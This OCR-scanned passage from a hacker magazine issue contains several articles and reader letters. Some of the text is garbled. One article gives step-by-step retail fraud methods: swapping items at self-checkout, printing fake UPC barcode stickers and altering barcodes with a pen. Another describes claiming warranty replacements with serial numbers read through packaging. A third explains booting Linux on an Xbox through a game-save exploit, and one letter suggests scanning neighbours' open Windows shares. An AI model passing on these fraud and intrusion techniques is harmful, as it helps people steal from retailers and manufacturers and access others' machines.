ber. When we argued it we were asked to post
the whole mouse back so they could change it.
When we did this they changed the mouse and
the original fraudster heard nothing.
This is stunning. Microsoft uses their pretty
packaging to give easy access to the serial
numbers of the products. These numbers are
treated as if they were generic model numbers,
but in reality they are the password to unlock
your warranty.
Look around the same shop you found the\
mouse in. There are loads of small peripheral I
devices that do the same, and mice are the
biggest culprit. And don't forget, most shops
won't mind you opening a box to have a closer
look, so long as it doesn't break any sealed '
boxes. Have a look around for other product
keys and see what turns up. I'm not going to
turn this into a guide to fraud but you will be
able to find other items.
I wrote this article in order to highlight
some real stupidity. Many large companies use
a similar system, and seem to be operating on a
huge amount of trust. Think about all that the
serial numbers are used for in terms of support
and warranty. Do you want your number pub-
lished to the world? When I discussed this with
a shop assistant at PC World 1 was told 1 should
take it up with Microsoft. Not surprising, but
when I discussed it with Microsoft I was told
that it rarely happens and is not of any concern. {
I'm hoping that this wasn't the official com- I
pany line.
Now that you've read this, go away and
think hard about what I've highlighted. I hon- j
estly don't support fraud. What 1 have written
is no different than stealing the mouse from the
shop. It's just a new method that no one has ad- |
dressed before. If you work in hardware, make I
sure that your product's packaging isn't reveal- I
ing too much. Too many products are turning
up in see through plastic packets. I'm sure the *
product is gorgeous to look at but this makes it j
a bit too easy to access the important details.
Why not simply cover the serial number with a
small label and then package it? State on the
box that the product should not be purchased if '
the label has been tampered with. I'm sure that
it wouldn't cost that much to add a small label
to cover a dozen or so characters. And to the j
people buying these products, when you get
the item home, ring immediately and register
this product with your name and don’t open the
packet At that point you'll be told if someone
else has registered the item. If it has been reg-
istered, explain the situation and then take the
product back to the shop and exchange it for
another or ask the manufacturer for a replace-
ment with an unregistered warranty.
A big hello to all that know me and before
flaming me, take a deep breath, count to ten
and think happy thoughts. We all have differ- ;
ent opinions and the world's a better place for
them; just don't force them down someone's k
throat. ; I
Page B »
ShOO Magazine
by XlogicX article by Charles in 20:2). The other numbers
drkhypnos314@hotmail.com are reserved.
There are a few ways to purchase a product The next five characters (2-6) are the manu-
with the price of another. Before I talk about facturers' code. For example. Post Grape Nuts is
that though. I’ll review the meaning of the bars 0 43000 10370 8 and Post Waffle Crisps is 0
and numbers on the bar code. After that. I'll ex- 43000 10540 5. All Post products should have
plain tricks like "inking" and the "sticker." 43000 for digits 2-6. If a manufacturer has more
What bar-space combination will make a than 100,000 different products, such as the
meaningful number? For UPC-A, there are store brand, then you might see different codes
about 23 different meaningful characters: one for the same brand in digits 2-6.
start guard, one center guard, one stop guard. The next five characters (7-11) are the prod-
ten left hand data characters, and ten right hand uct code. The last character is the checksum,
data characters. I specify right and left because though it's a little more than a sum. To derive it
the code is different on each side. Imagine the by hand, you take the 1st. 3rd, 5th. 7th, 9th, and
data characters as 7-bit binary words: where the 1 1 th numbers and add them up. Multiply that
0 is a space, and a 1 is a line. sum by three. Then add all the remaining
iain inn n hi-
ll ii nun ii ■■■-
0123456789
Notice that all left-hand characters start with numbers to that. Now what you want to do is
a 0 and end with a 1 . Also, the right hand side is add a number to that sum that will give you a
just the complement of the left-hand side; so if number with the multiple of ten. The number
the bit were a 0 on the left for a certain charac- you chose for that is the checksum. The original
ter, it would be a 1 on the right for the same code that Charles had was 5 21000 23030 8.
character. Another thing to notice is that there 5+l+0+2+0+0=8. 8*3=24. 24+2+0+0+3+3=32.
are two variable width spaces and lines per 32+8=40, the next closest multiple of 10
character, no more, no less. (checksum being 8).
Imagine that start and stop as a 3-bit charac- The Self-Checkout Switch: Prices may vary
ter and the data being 101. These characters in this example. You purchase two 32oz Power-
appear at the beginning and end of the code. Aids ($1.49) and a 32oz Gatorade ($1.29) for
The center guard is the 5-bit character 01 010 -it the price of three Gatorades ($.40 savings),
appears in the center. First, scan Gatorade, place it on the demagne-
Now that we know how the characters are tizer, and then put the Power-Aid in the
formed, how about the meaning of the num- bag/(scale). Do the same for next Power-Aid,
bers? The first number specifies what kind of and then do the Gatorade finally,
application the bar code will have. 0, 6, and 7 The advantages of this method are that it is
mean that it is a normal UPC code. A 2 means it mechanically easy and doesn't require much
is a weighted item like produce. 3 is the Na- knowledge. The disadvantages of this method
tional Drug and Health related code. A 4 means are that it only works for self-check out. and the
it is specific to that store. A 5 means it is a supervisor of the self-checkout may still find
coupon (notice the "5" in the Coupon Trick your activities suspicious. Also, you need to
Spring 3 0 0 V
Page 3S
find things around the same weight.
The Sticker: I didn't purchase any software
for this and couldn't find any freeware that
would get the size how I wanted it. I didn't look
very hard though. I did it in Paint, making each
small line and space one pixel wide and having
the whole bar code about 86 pixels vertically.
The whole barcode should be about 98 pixels
wide. 1 selected the area from 0,0 to 102.88 co-
ordinates and copied (not arbitrarily). I pasted
this into Word and stretched it horizontally by
two of their units. After printing, it looks ex-
actly like a barcode, size and everything. It also
leaves enough room for the correct numbers to
show through, so if I get caught, there's a
backup plan.
The advantage of this is that you don't need
the extra Gatorade to buy a Power-Aid at the
Gatorade price. Just print the barcode on a
sticker and slap it on the Power-Aid. Another
advantage is that now you can go to a normal
checkout. Depending on the cashier, they prob
ably won't notice the sticker and if you strike
some conversation with them, they won't notice
a different product on their monitor. You may
want to purchase a couple of legitimate things
to throw them off though. This method also
looks less suspicious than the self-checkout
switch. One downside is that you could still get
caught if the sticker is identified or if a different
product is noticed by a cashier (or supervisor of
self-checkout).
Inking: This is my favorite method, and by
far the least useful. What you do is take a non-
glossy pen and widen some lines to change the
code. This is hard to do, since the changed line
should actually be a number, the changed num-
bers should actually be a product, and the prod-
uct should hopefully be cheaper. I made myself
a chart of the convertible numbers on the left
and right side, respectively.
811 81 I 8
1 I II 1
A practical example would be converting those
two Post products I demonstrated earlier. Grape
Nuts was 0 43000 103708 and Waffle Crisps was
0 43000 10540 5. To change Grape Nuts to Waffle
Crisps, you convert the three to a five, the seven to
a four, and the eight to a five (notice they're all on
the right side since the manufacturer part would be
the same).
Although this is a limited method, as long as
it's not done in front of a camera you probably will
not get caught. You would also get Uber-Hardcore
points for doing it this way. I've only done this
once successfully and have definitely gotten it
wrong a couple times.
Shouts: Prof. Tomasi, Evin, and 2600 Phoenix.
S bOO Haqazine — '
Deb i an
Unmodded
ur
hav'fi”J[i)ur \Tf5\, you're bored of
[he gaaM that you have, you fancy! a chal-
leng^^^wny not install GNu7Cmux on it?
Everyone has heard things on the web about
the efforts to make various distributions run
on the Xbox and of course there are many
horror stories of people making their Xboxs
into nice door stops. However, installing
Linux is surprisingly easy provided you
know what you are doing.
Back in 19:4 Live_wire showed us how to
install Ed’s Debian on a modded Xbox. Since
then there have been many advances in what
you can do with your Xbox and many more
distros have appeared, including Gentoox (a
Gentoo clone), Slothbox (a Slaekware clone),
plus a release of Mandrake and SuSE. Ed's is
the most mature and one of the better main-
tained. All the distros and information on
them, along with more detailed technical
documents are available from the xbox-linux
website over at http://xbox-linux.sf.net. The
SourceForge project page (http://www.
•sourceforge.net/projects/xbox-linux) hosts
all the files needed in this little howto.
A word of warning: Some things can and
will go wrong. The author doesn't take any
responsibility if Bad Things happen when in-
stalling Linux on your Xbox. If in doubt,
don't try it.
Before you start you should have the fol-
lowing things at hand, otherwise you will end
up having to go to the store halfway through
the operation. An approximate equipment list
follows (some parts are optional):
An unmodified Xbox.
A USB keyboard.
A USB memory device (i.e., a memory stick
l or USB zip drive).
•Spring 3 0 0 V
A USB mouse (optional).
A USB hub (optional).
The game 007: Agent Under Fire for Xbox.
A computer running Linux (kernel 2.4.20 or
2.4.21 with source and development tools).
A network (in some form).
A relatively high speed Internet connection.
Patience.
Presuming that you have already read
Live_wire's article you should have a work-
ing USB adapter. If not. go away and make
one then come back. Once you have a USB
adapter made, plug in a USB memory stick.
The Xbox will detect it in the Dashboard and
it will show up under memory. The Xbox will
want to format it, so make sure you don't
have anything important saved to it that you
want to keep.
All programs running on the Xbox have to
be digitally signed by Microsoft. This means
that it is very hard to run code that you are
not supposed to. However, workarounds have
been found. There are bugs in certain games
which allow non-signed code to be executed.
On a very basic level, this is done by crashing
the Xbox whilst loading a game, then getting
it to load Linux instead. This can be done in
both MechAssault and 007: Agent Under
Fire. What follows is how to do it with 007:
Agent Under Fire.
There are quite a few ways to get the 007
hack onto the Xbox. The one I will describe
uses a Linux workstation. This method does
not require you to open the Xbox up but does
require you spend a little money on a USB
memory stick. You can pick these things up
for around 20 pounds in most computer
stores (probably cheaper online). Make sure
that the stick is supported by the Linux
usb-storage.o driver. .
7 — S
■Page 3\
' For this you will need a Linux PC with all
the standard development tools (gcc. make,
and everything else you need to build the ker-
nel). You will also need the source to the
2.4.21 kernel. I presume at this point that you
know what you are doing and have compiled
the kernel before (if not. go and compile a
few to practice then come back).
Okay, now we need to patch the kernel
with support for the FATX file system. This is
what the Xbox uses to format its hard drive
and also its memory cards. I will show two
ways of patching the kernel and it depends on
how lazy you are as to which you pick.
The first way is to use CVS. You need to
get some of the current pre-patched sources
from the xbox-linux cvs site such as the
2.4.21 kernel source. This requires that you
have cvs installed. Assuming you have it in-
stalled. create a directory (say ’Vusr/src/tmp")
and execute this command in there:
cvs -z3 -d: pserver : anonymousiscvs .
~ source forge . net : /cvsroot/xbox- llnux
«*co kernel
This might take a while but eventually
you'll have downloaded the needed kernel
source files to the directory. An "Is" will show
you have one directory named "kernel." This
folder contains the Xbox specific files for the
kernel. All you need to do now is copy the
(Xbox specific) files across to the actual ker-
nel source tree, replacing as you go. Assum-
ing that the source was unzipped to
7usr/src/linux" and the cvs files are in
"/usr/src/tmp" we execute this command:
cp -rf /usr/src/tmp/kernel/* /usr/
•*src/ linux/kernel/
Once you've done this, change directory
to the real kernel source (e.g. "/usr/src/linux")
and do a "make config", "make menuconfig",
or "make xconfig" as usual. Now you can
carry on configuring the kernel.
If you don't like cvs. prefer kernel 2.4.20,
or if you find a patch file easier to use, you
might be better off using an older patch that
is still available from the project page but not
recommended. At the time of writing the file
was called "kemel-2_4_20-0_7_0.patch.gz."
This is just a normal kernel patch file. Once
you have untar/gzipped your 2.4.20 kernel
source file (I assume to "/usr/src/linux" from
now on), copy the patch file to a level above
(e.g. "/usr/src"), then change directory to the
source. Once you’re there, execute the
1 following command:
zcat . . /kernel-2_4_20-0_7_0 . patch. 1
**gz I patch -pi
This will apply the patch to the kernel.
You should have a list of files scroll up the
screen that have been changed by the patch.
Now that your kernel is patched, it's time
to configure it.
The first option you need to add is support
for the USB memory card (if you already had
this, then ignore this section). The USB stor-
age driver is really just some glue code be-
tween the USB and SCSI subsystems. So,
first things first - add SCSI support. It's your
choice if you want to do these as loadable
modules or as built-ins. The SCSI options
you want are SCSI Support and SCSI Disk
Support. Exit the SCSI menu and go into the
USB Support. In there you'll need Support
for USB, Preliminary USB Device File Sys-
tem, USB Mass Storage Support, and one of
the USB Host Controller Devices. The last is
up to you to choose. If in doubt select all of
them as modules and see which one loads.
Now to add the support for FATX. This is
done in the File Systems menu. The only op-
tions that you need to enable are FATX
(Xbox) fs support, then within Partition
Types select Advanced Partition Selection
and then Xbox Support. Now you can exit,
saving your changes. Compile the kernel as
you would normally. Remember to re-run lilo
(or whatever bootloader you use) and then
reboot with your new kernel.
Now we have a brand new kernel and all
the tools that we need to copy the save game
file to the memory card. First - to download
the files we want. On the xbox-linux Source-
Forge project page there is a file called
007distro.tar.gz. This file contains everything
you need to get Debian onto your Xbox (be-
ware: this file is quite large, over 200 megs).
Unzipping the file will leave you with two
folders. One is name memcard, the other is
called harddisk. You can ignore the latter for
the moment as we don't need it until further
on in the process.
In the memcard folder there is an .ini file
and also a directory called UDATA. What we
are interested in are the contents of the
UDATA folder. In there is a directory called
4541000d. This is an Xbox game save. In it is
the game that will crash the Xbox and load
Linux. Now you need to copy just this folder
to your memory stick.
Mount the drive as usual and copy the di-
rectory over. To check that the copy has gone
okay you can load up the Dashboard on your
Xbox and in the Memory menu you should
be able to see your card and also see that
there is a game save on the device. All that is
left for this part now is to copy the save game
to the hard drive of your Xbox. This may take
a couple of seconds as the files are relatively
large. In my experience, sometimes the Xbox
will say that the game files arc corrupted or
will try to format the device. All you have to
do is try again. Remember that the FATX dri-
ver is still in its early days and things can
(and probably will) still go wrong.
The actual installation is relatively easy.
Plug in your keyboard, but leave your con-
troller in too as you'll need it to control things
at first. Now load 007: Agent Under Fire.
Wait until you get to the main menu screen.
Select Load Game, then Xbox Hard Drive.
This might take a while but eventually you'll
get a kind of chime noise and xromwell (the
boot loader) will display some information
for you. At this point it'll tell you the size of
your Xbox hard drive. This will be essential
for later but it's very fast so try to spot it and
remember it.
After xromwell has done its thing there
follows the normal kernel boot process, mod-
ules will load, and BusyBox will start up.
You might need to hit enter a couple of times
to get things to start up. Once you do there
will be the normal login prompt. You can lo-
gin as root with the password xbox. Now you
need to get the installation files onto the
Xbox. Probably the easiest way to do it is to
put it on another computer running an http or
ftp daemon, then use wget to fetch the file
from there. The file you want to be serving is
the contents of the harddisk directory from
the 007distro.tar.gz file. You can tar and gzip
it to aid transport over the network as Busy-
Box has those tools at your disposal. Alterna-
tively. you could use Samba to transfer the
file by just mounting the appropriate share on
your Samba server.
Before you start the transfer you might
want to check the network settings. By de-
fault the IP address is set to 192.168.0.64/24
with a default gateway at 192.168.0.1. You
can use the usual tools to set them differently
or if you're using DHCP, dhclient is
available.
You want all of these files in the /media/E\
which is the part of the Xbox hard drive used
for game saves. The partition is about five gi-
gabytes big so unless you've been saving lots
of games and/or audio there should be plenty
of space for the file. Now we must replace the
linuxboot.cfg file with a version that points to
the files we have just copied over, so we
execute:
cp /media/E/linuxboot . cfg /media/E/
**UDATA/454 1000d/ 000000000000
If you are running low on space you can
delete the tar.gz file which we downloaded.
Now we can reboot and pull off the 007
trick again to boot into Linux once more.
Now when you boot there should be X-Win-
dows running. Hopefully this will boot and
give you a login. You can plug in your USB
mouse now if you like, although you can use
the Xbox controller to make the cursor move.
Once you login as root (with password xbox)
you will see Window Maker start up, get a
terminal, and execute:
/sbin/XBOXLinuxInstaller
This will start up a little graphical tool
asking you some questions. These are
straightforward, network setting etc., al-
though there is one that can cause some trou-
ble. That is the choice between installing to
the E partition (where the game save files are)
or to the spare unpartitioned space on the end
of the hard disk. This is where you have to re-
member the information that xromwell told
you earlier. The original Xbox had 8.4 giga-
byte drives whereas the newer models have
10 gigabyte drives. Now if you have an old
model, you can’t install Linux in the unparti-
tioned space. You have to install to a loop-
back file in the E partition. On the other hand,
if you are lucky and have a newer device then
the choice is up to you.
Assuming you made your decision, you
can wait and let the installer get all of the files
copied over and then reboot. It is possible
that the install might not have worked, in
which case you can repeat the final part
again. This happened to me a number of
times but practice makes perfect. If there
were no errors then you have succeeded in in-
stalling Linux on your Xbox. Congratulate
yourself by apt-get update-ing and down-
loading some new free software.
Shouts: Wilz, Woody , Druga. and miki_.
Spring 3004
Page 31
fffllMD -Cx-EJKIS-ES
\
/w
/w
/w
Assorted Questions
Dear 2001):
Can you tell me when article submissions close for
the next edition? 1 have an idea for tut article I'd like to
submit, but haven't put pen to paper yet. Just want to
know my time frame.
Jason
While »e try In keep a strict deadline for ourselves,
oftentimes articles are selected for a future issue rather
than the current one. In other words, it doesn't really
matter if you miss one of our deadlines. Just send us
what you have. Plus, we're always missing our
ilecullines anyway.
Dear 2600:
I have been reading through hours and hours of
Bush commentary and I think, in fact at this point I am
sure, that Bush is wearing an earpiece whenever he is
talking to the press. Please tell me you can intercept or
know anyone that can intercept this signal.
Andrew
If this is true, you would lutve to be pretty close to
the signal in ortler to intercept it. Tluil in itself would be
a far bigger challenge. But assuming you somehow
managed to intercept and possibly alter whatever mes-
sage was being sent, the result would probably be a lot
of confusion and commentaries then didn't make much
sense. Do you honestly think anyone would notice the
difference ?
Dear 2600:
I realize that most of you don't agree with projects
like TIA or Big Brother, but at the same time you want
all information public. How do these two coexist?
Would you agree with Big Brother if anyone could ac-
cess the information it collected? Keep up the great
work.
tchnprgrmr
Actually we know of very few people who want all
information to be public. We believe information, par-
ticularly that Of a private nature, needs to be protected.
Often this isn’t the case and one of the best ways of de-
termining this is for systems to be constantly tested for
security holes. This leads to the messenger frequently
being blamed for the message. Hackers who uncover
unprotected private information are treated as if they
created the weak security when all they did was figure
out a way to defeat it. The media portrays them as the
threat to your privacy when in actuality hackers do
much more to protect it. We consider their actions to he
responsible, especially when they reveal their findings
to the world.
Meanwhile, all kinds of corporate and governmen-
tal entities seek to invade our privacy on a constant ba-
sis for reasons ranging from surveillance to marketing.
While it would solve nothing to give everyone access to
the information these entities collect, it's extremely im-
portant to understand exactly what they're doing and
how, as well as ways to protect oneself from such
intrusions. This is something else they don't want you to
know.
Dear 2600:
Could you help me? What date can be considered
birthday of 2600? Thank you in advance.
Alexey
NfP "Informzasehita", Russia
2004 is our 20th anniversary so we consider every-
day r if they would simply disable the "offending” fea-
tures. Look at the people around you who willingly and
constantly open attachments from complete strangers.
1 liven Unix and Unix-likes can be "infected" by mali-
cious programs when the user allows them to be by his\
or her own actions.
Reverend
Dear 2600:
First of all. congratulations on the 20 year anniver-
sary. You guys always seem to schedule HOPE the in-
stant I leave the area, so I won't be able to attend this
year either. But anyway, on to the actual purpose of this
letter. In issue 20:4 Sparklx wrote that he could always
reregister his copy of Windows XP by just typing in the
registration code. This is because he is using the corpo-
rate edition of Windows XP, which allows a certain
number of installs per CD Key, which is usually a mas-
ter key used to identify the organization, like a school
or business. The reason why you have no troubles reini-
tializing your installs is because that version and key
are meant to be installed on a wide variety of machines
right from the get-go, so making the corporate version
freeze itself after a hardware change is bad. because
there's more than one physical computer per copy of
Windows. The single-user versions (Home and Pro)
will not let you reregister the product easy-peasy like
that, you have to go call M$ and they'll walk you
through resetting it. Unless of course you don't have an
active Internet connection. Then you have to cry in the
comer for a few days until they send you something to
restore it with. Hooray for shitty companies.
Also worth noting concerning Windows XP. Mi-
crosoft has re-released the PowerToys toolkit, which
can be found here:
http://www.microstift.com/windowsxp/pro/downloads
"•/powertoys.asp
Some good stuff is included.
Daniac
Dear 2600:
Hello. I've been reading 2600 for as long as I re-
member. First off. I've never been very intrigued by
groups of people with an "extremist" point of view.
And 1 think that a lot of the times the hacker commu-
nity either gets categorized under this heading or legiti-
mately is under this heading. But as strong as your
opinions are on current affairs and freedom of speech,
it's never really struck me as being extremist, even
though all of the characteristics are there. There's just
something that seems right about what you're fighting
for. There's no real hatred to speak of in your message
(as there is in a lot of groups nowadays all across the
board). Your message seems to be that of understanding
and hope that the world won't become some Orwellian
nightmare.
I just wanted to finally write you guys to say keep
up the good fight, and remember, there are people in the
government right now (not just trying to get in) that
want to help our cause, and we need to utilize them to
the best of our ability.
NGTV|3
Help Offered
Dear 2600:
1 have read many letters in 2600 complaining of
telemarketers. Well, I'm a telemarketer and I hate my
job and 1 hate the company I work for. Is there any info
I can get to help you guys? I work for Sitel Corp. We
sell accidental death insurance for JCPcnny. Bank of
America, Chase Bank, and many many more. I do
know that Sitel is barely given any customer informa-
tion besides phone number and address, sometimes a
birthday.
loco freak
Any info you can give us on how that whole indus-
try works is something that would benefit a good num-
ber of individuals out there. As with all of our company
insiders, we recommend keeping a low profile and not
revealing any information that could gel back to you.
We believe people have the right to know this kind of
thing, even more so than such companies believe they
have the right to know things about us.
Observations
Dear 2600:
Recently I have been noticing the use of insecure
operating systems in many many more devices. For ex-
ample. British Telecom seems to be using Windows XP
(perhaps Emhedded) on their now quite common Inter-
net enabled phone booths. I know it is XP because they
regularly blue screen and dump details of the crash to
the screen. Worse still, 50p gets you a quick trip to
whatismyip.com and a brief scan with nmap reveals
several attack vectors. Perhaps in the future mass phone
hacking will be a new form of protest or terrorism?
Speaking of phones. I'm sure many readers will
have heard about "bluejacking," the act of cracking
someone's mobile phone via bluetooth. UK cable TV
subscribers might like to plug their TV directly into
their wall outlet and scan the frequencies. On NTT you
can often find a channel showing some kind of Win-
dows desktop (looks like 2K) running diagnostic soft-
ware. Sometimes you can even see the IP address of the
machine. Speaking of which, why not download a Win-
dows share scanner and scan your local class C subnet -
you are sure to find at least two or three machines will-
ing to offer up their drives for you to browse. You can
even print to random people's printers.
Most worrying of all is what I discovered about po-
lice computer systems here in the UK. The police na-
tional computer has been cracked before, but rather
than learn from the lesson they seem to have installed
more insecure hardware. For example, many police
cars in the south are now fitted with some kind of com-
puter terminal running Windows 98. Windows 98, an
OS that even Microsoft abandoned as fundamentally
flawed and unfixable. Sometimes you can pick up ac-
tive WiFi cards running in the cars loo - quite a lethal
combination I’m sure you will agree.
If you can't trust important systems like these, you
have a real problem.
Mojo
Dear 2600:
You guys give inspiration to all the free minds, to
not just think outside the box but outside the shell as
well.. Did you know that 2600 is the zip code in the city
of Parachinar in Peshawar (Pakistan)? 2600 is also the
home to the NBP Operations Parhoti Main Branch.. By
the way. is that Olivia on page 2 of 20:3? Also, in Nepal
a group of rebels have been fighting for a communist
republic since 1996 and the uprising has so far claimed
more than 2.600 lives. Which led to the formula on
page 33 in 20:3. Sheer brilliance!
4?
Poetics
And every now and then there's simply no possible
answer.
Dear 2600:
I started reading 1 9X4 this Monday afternoon after
class and stumbled across something rather ironic: the
leader of the opposition of the "Party" is named
Emmanuel Goldstein. Just thought this was kinda scary
and possibly foreshadowing considering that the 1984
atmosphere seems to be more and more of a reality in
the USA through the "improvement" of our rights and
freedoms. Just thought I'd bring this up even though I'm
sure someone pointed it out already before I did. Keep
up the good work and can't wait until the next issue!
(By the way. does anyone know of a location in Paris or
France where 1 could get ahold of 2600?)
Jim_Steele
We hope to have a complete list of our international
distribution points in the near future. We do know that
they leave a lot to be desired and we're trying to figure
out a way to fix that.
Dear 2600:
I attend a high school in central California that is.
like most places in the central valley, unbelievably con-
servative. Most of the looks I gel from people who see
"The Hacker Quarterly" on my sweatshirt are simply
priceless, but nobody recognizes 2600 for what it is.
Oddly enough, the only person who did was our foren-
sics teacher. After spying my sweatshirt, he and I en-
gaged in an interesting conversation about hacking.
Evidently, he was one of the "originals" who started
hacking back before 2600 was even in print. Hacking
Arpanet with his college buddies was one of his most
memorable experiences. Thanks for the means to do
something interesting and worthwhile during school.
jake
Dear 2600:
This could be way off base, but I had heard of peo-
ple stealing PBX accounts and then recording the pass-
word as the greeting. This allowed litem to use the
account as kind of an audio message board. Not sure-
just a thought.
drlecter
Wouldn 't it also allow them to instantly lose the ac-
count to the next idiot who wanted it for themselves?
Not to mention the original owner.
Dear 2600:
This is perhaps the lowest level "hack" to ever ap-
pear in this outstanding magazine but if you press both
the left and right buttons at the same time on a National
Vendors Shoppertron food vending machine, the dis-
play will show the current time and internal tempera-
ture in the format HH.MM DDF (e.g. "11.20 39F" for
1 1 .20 am, 39 degrees). After a few seconds, the display
goes back to normal. This has me curious as to what I
can do with the front panel buttons on other vending
machines. Til let you know.
Don't let the fascists bite.
SAR
Dear 2600:
I'm not a longtime reader, but keep up the good
work. I was watching the news and there was a shorty
Not everything you say is true.
•Page 3 k
darkpoJt
Sb 00 klagazina
seel ion on the use of touch-screen ballot machines.
I'hey were talking about how these were being imple-
mented in Florida to avoid a repeat of the fiasco of
’000. 1 am sure that you have seen these machines be-
fore. They use a keycard that you slide into a card
reader on the machine to allow use of the touch-screen
and to identify your vote. There was a "computer ex-
pert” who was quoted as saying that anyone with good
knowledge of computers could use software to allow
the cards to register multiple votes or gain access to the
terminals for other purposes. I just wanted to bring this
to the attention of the 2600 community as I thought it
was interesting.
I.ouie
Dear 2600:
We recently had an issue in our office with some-
one's wireless keyboard and mouse being picked up on
someone else’s wireless keyboard and mouse receiver
across the building (through several walls). They were
on the same channel and a simple channel change for
one of the units fixed the problem. This to me seems
like such an obvious security issue. I know that people
have been building rigs to capture xlO cams, so why
not a unit that can capture wireless peripherals? Seems
like a keyboard would be the most useful to capture. 1
know a keyboard can't transmit nearly as far as. say. an
AP. but in the dense work environments of big cities, it
may prove useful to look into.
lint
Dear 2600:
On February I Ith. Army Chief of Staff Gen. Peter
Schoomaker approved the wear of the reverse field
U.S. flag on the right shoulder of all soldiers through-
out the force regardless of deployment status. This
l>alch, up until now, has only been worn by troops dur-
ing deployment in a joint or multinational operation.
I'he change is said to represent "our commitment to
tight the war on terror for the foreseeable future." To
put it a different way. it is another symbol of our con-
stant state of war without end. Soldiers have until Octo-
ber 1 . 2005 to get the insignia sewn on their uniforms
due to limited supplies (it also shows that this change is
going to last a while).
To most civilians, this change in uniform policy
might seem trivial. As a soldier, I can tell you that such
a change is very significant. The various insignia on a
uniform can tell a great deal of information about the
individual wearing it, such as his/her training and ac-
complishments. It has great symbolic meaning that can
affect the state of mind of the person in that uniform. To
wear the reverse field flag is to be in the mindset of
being deployed at all times, be it at home or abroad.
Stephen
Military Readership
Dear 2600:
This is in response to the editor's comments regard-
ing c()10r3dfr34k's letter in 20:3. Although it is not for-
bidden to receive 2600 while in the military, it can be
nsky. I receive my subscription to my military mailing
address and I have not encountered any problems from
the postal workers (also military), mainly because of
the packaging the magazine is shipped in (thank you).
I he reason it can be risky is due in large part to the im-
age that accompanies a hacker. The military has nega-
tive views of this image. Like any other organization’
one could work for. it's all about your reputation. If
your reputation is damaged your career could be dam-
aged and chances for advancement become minimal.
And if you're someone like me who works in the com-
munications. electronic, or intelligence fields and deals
with classified materials, your risks run greater. Then
again you'd be surprised at how many people in these
fields read and know about 2600. Continue to enlighten
and I'll continue to read... as long as you stay with the
inconspicuous packaging of course.
dOrk
Dear 2600:
This letter is in response to the issue brought up in
20:3 regarding whether it is risky or forbidden to re-
ceive 2600 while in the military. As far as your average
military man or woman, legally I don't think they can
forbid you from reading or receiving your fine publica-
tion. While in the service you are supposed to have the
same rights as anyone else. However, there are a few
cases where it would definitely be risky. While in boot
camp for example, your mail is closely monitored. 1 re-
member when I was in boot camp my buddy tried send-
ing me a copy he hid in a package he sent tnc. My drill
instructor found it and he threw it out. It might also be
risky if your job in the military has something to do
with computers or security. With the constant threat of
terrorism, these fields are closely monitored and some
red flags might be raised in that situation.
If they would just read the magazine, they would
realize it's about addressing issues and sharing informa-
tion. But sadly, they make their judgments from that
one "dirty" word on the cover.
misterjaget
Dear 2600:
In response to the letter from cOIOr3dfr34k and
your follow-on question about whether receiving 2600
was forbidden or risky, it most certainly is not risky,
forbidden, illegal, unlawful, or anything else. I have
served in the US Army (including being deployed for
OEF/OIF) for nearly 19 years and am in a position to
respond with some degree of authority.
I am a certified, glorified, and professional com-
puter geek (system developer, program manager, soft-
ware engineer, etc.) for the Army and have used my
skills and talents (acquired from many formal and in-
formal sources such as 2600) to better the systems used
by today's military forces deployed throughout the
world. It is never wrong to learn and to apply knowl-
edge where appropriate.
I will warn folks, however, that to attempt to use
their skills and knowledge to exploit military systems
may indeed be illegal and I strongly discourage such
actions. Guys like me will find you and you don't need
the hassle. Not a challenge, only a fact.
If cOIOr3dfr34k will send you guys an address, 1
will personally ensure that he receives 2600 while
deployed.
Have a hooah day and keep putting out 2600. It is a
great source of information and entertainment (for a
geek like me).
MegaGeek
Dear 2600:
I picked up my first ever 2600 Magazine last
month, issue 20:3. and noticed a fan letter from a
Spring S 0 0 V
Page 37
soldier stationed in Kuwait. You wanted to know if it
was forbidden or risky to receive 2600 if you were in
the military. Just so you know, it is not. In fact, in the
intelligence community it is encouraged. My father, a
former intel officer, required 2600 and other related
magazines be read by those under his command for
both educational and security purposes. Also, their
right to read whatever they want is constitutionally
protected in the U.S. just like civilians' rights arc
protected.
Anyway, just wanted to let you know. The maga-
zine is great and I can't wait for the next issue.
slack_pizza_guy
Dear 2600:
Here's the deal.
Department of Defense Directive 1325.6 "Guide-
lines for Handling Dissident and Protest Activities
Among Members of the Armed Forces" - 3.5. 1.2.
While the mere possession of unauthorized printed ma-
terial may not be prohibited, printed material that is
prohibited from distribution shall be impounded if the
commander determines that an attempt will be made to
distribute.
What this means is that you can have and read 2600
on base. There are many other rights that active duty
people have that a local command may try to tell you
that you do not. Go to http://girights.objector.org to find
out more.
jim
Dear 2600:
There seemed to be some confusion about receiv-
ing/reading 2600 if you are in the military. I work in in-
formation assurance for the Marine Corps, so I can
speak for the USMC's stance on publications such as
2600. Any reading material that could be beneficial to
the security of our network is encouraged. There is no
discrimination against this publication, or any other
books for that matter (that are job related). I’m a sub-
scriber and my issues are delivered to my place of work
(which is a secure building). Nobody has a problem
with me reading the magazine, and I'm generally asked
if anything useful was mentioned in the magazine after
I'm done reading it. Education is encouraged through-
out the DoD as far as I've seen.
As far as the article by sunpuke (DISA. Unix Secu-
rity. and Reality ) is concerned - the article was true but
people need to realize that the DoD doesn't rely on
DISA STlGs. DISA is currently putting out Gold Disks
for Windows 2000, Windows XP, Windows 2000
Server, Solaris, and Linux. These disks help automate
the process of securing a machine. All the Windows
disks are publicly available while the Solaris and Linux
disks are still in prototype so they have to be personally
requested. The files are available at https://pa!ches.
••monl.disa.mil/golddsk.hunl - although this site might
not be accessible outside the .mil/.gov realm. The DoD
takes security very seriously and as far as the Marine
Corps is concerned - we have a very strong focus on
computer security. 1 don't know anybody that uses the
DISA STIGs. For the most part people use a combina-
tion of NSA papers (http://www.nsa.gov/snac/), com-
puter security books, and whatever knowledge they've
picked up in Uaining. 1 just wanted to point out that
from my standpoint, we keep track of everything going
on in the security industry and I feel we keep up to date
with everybody else. \
Anyways, thanks for putting out a great magazine.
ESQ
A Problem
Dear 2600:
Currently I have someone stalking my family from
a location in Ohio. Making a very long story short, he
calls my house and my caller ID shows a "token" tele-
phone number. He can call back in a minute and the
caller ID will show a completely different number
across the U.S. He has gone as far as to call the local
police department and pose as a member of my family
claiming to have murdered the entire family. Needless
to say the SWAT team showed up and the rest is history.
My research shows that this perpetrator has done this
before numerous times. The Ohio state police depart-
ment is aware as is the local police department where I
live. He has served time in prison for assault and drugs,
so he is capable. I am trying to protect my family.
My question looks to you to figure out how to iden-
tify where he is calling from. Is there a way? I would so
appreciate any help. Prior investigations have dead-
locked at that point. Thank you!
ALI
Let's see if we have this straight. The police depart-
ments know who this guy is and he has yet to he prose-
